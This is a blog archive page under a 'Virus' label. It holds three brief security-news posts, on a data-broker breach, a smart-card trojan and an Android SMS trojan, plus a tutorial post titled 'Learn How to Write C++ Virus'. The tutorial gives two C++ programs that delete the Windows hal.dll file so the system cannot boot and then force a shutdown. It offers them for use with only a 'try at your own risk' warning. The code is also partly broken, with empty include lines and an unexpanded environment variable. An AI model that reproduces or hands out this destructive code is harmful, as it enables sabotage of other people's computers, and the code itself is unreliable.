Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Saturday, September 28, 2013

4 million US citizens personal data sold online by Hacker


An illegal service that sells personal data of US citizens online, which can then be used for identity theft hacked into the networks of three major data brokers and Hacker stole their databases.

Cyber attack has given them access to Social Security Numbers, dates of birth, and other personal details that could put all our finances at risk.

Thursday, January 19, 2012

DoD ID cards under attack



A pernicious virus that infects the middleware of smart card readers is attacking users of U.S. Department of Defense (DoD) and Windows smart cards. A variant of the Skyipot trojan, the malware uses a zero-day vulnerability in Adobe software to install a keylogger and obtain the PINs and certificate information from smart cards.

The trojan, first identified by Alienvault Labs, appears targeted at a particular type of application.

Wednesday, January 11, 2012

Your Android really needs Antivirus Security ?

Untitled-1

       Why shouldn't you protect your Android phone? Why to use an Antivirus for your Android? So that users can protect their devices from trojans, viruses, spyware, and other types of malware. Most people carry a lot of sensitive data on their phones. Recently an SMS Trojan horse posing as a media player began infecting Android phones on Russian networks. Once the victim installed the malicious app, it began sending text messages to premium numbers, leaving the user with a huge phone bill.

Thursday, November 17, 2011

Learn How to Write C++ Virus

Hey Guys, today i will show you how to write C++ virus, which will delete hal.dll file from computer, and without which system will not boot.

Warning: Try at your own risk.

compile following code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("c:\\windows\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this script which finds system drives automatically, some times it can be in D:\Windows, for that compile following code:


#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

Enjoy..!!!